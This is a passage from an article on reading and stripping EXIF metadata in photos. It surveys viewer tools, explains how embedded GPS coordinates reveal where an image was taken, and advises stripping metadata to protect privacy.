taken. It also tells us which camera has been used for the image. This information is vital if we are going to find a lost camera belonging to a particular person. If we have a database of EXIF data from public images on the internet, a lost camera can be found by comparing the EXIF data of the owner’s image and the stolen image. EXIFDATA.COM Type of tool: Online URL: EXIF Data Viewer Input interface of this tool Metadata shown This tool offers a lot of details and can be considered advanced. It reveals every tiny bit of metadata found embedded the images as you can see from the above example—that image was taken from an Apple iphone 4. Such easily available information will definitely make any attack very efficient. In the image below we see the geo-localization of information. As mentioned before, the default settings of smartphones keeps the GPS settings switched ON. As a result, when an image is taken, its geo-local information (like longitude, latitude, and height above the sea level) gets embedded in the image. This comes in very handy when trying to pinpoint the exact location of a criminal who might be absconding from law. GPS Position Exactly Displayed Opanda IExif Tool Type of tool: Freeware Download URL: Exif viewer : Opanda IExif - Professional EXIF / GPS / IPTC Viewer & Editor in Windows, IE & Firefox Summary of Metadata on Opanda Opanda is a very advanced tool. It allows for the categorization of various kinds of metadata that can be found in an image. It categorizes data into GPS and IPTC sections. The summary includes all the details, and this tool is very organized compared to all other tools. It also delivers optimum performance with respect to various images. One added advantage of this tool is that it also allows us to edit EXIF data within the image. This is very helpful when we would want to strip off the metadata. We can either change and mask our information, or delete the information altogether. Windows Image Property Viewer Tool type: general, built-in operating system feature The above figure shows how to strip off general metadata This method for viewing metadata is designed for a layman who isn’t very adept at using advanced tools and technology. These interfaces also don’t strip off a huge amount of metadata information like Opanda. Thus, this is one of the least used methods when it comes to stripping or viewing EXIF data. Writing a Custom PHP Script: The following image shows a script in PHP which will capture the EXIF data from an image. It returns the time and date when the image was taken, the GPS coordinates of the location where the image was taken, and also tries to read from the headers of the image. Conclusion In this article we have reviewed the hidden information that pictures can reveal to a forensic expert. Undoubtedly, hidden metadata provides the truth in the age-old quote: “A picture is worth a thousand words.” I have tried my best to show you both faces of the coin, i.e. the advantages to both reading the metadata and also to stripping off the metadata. As many people spend time projecting a new virtual image onto the public Internet, they are unaware of just how much information they are unintentionally revealing about themselves. A stalker can find all this information and can still trouble you and invade your privacy. Thus any uploading interface should be embedded with scripts to strip the image being uploaded of metadata so that the user’s privacy is not compromised. With these words, I advise all readers to keep a close watch on the amount of information you reveal online. Sursa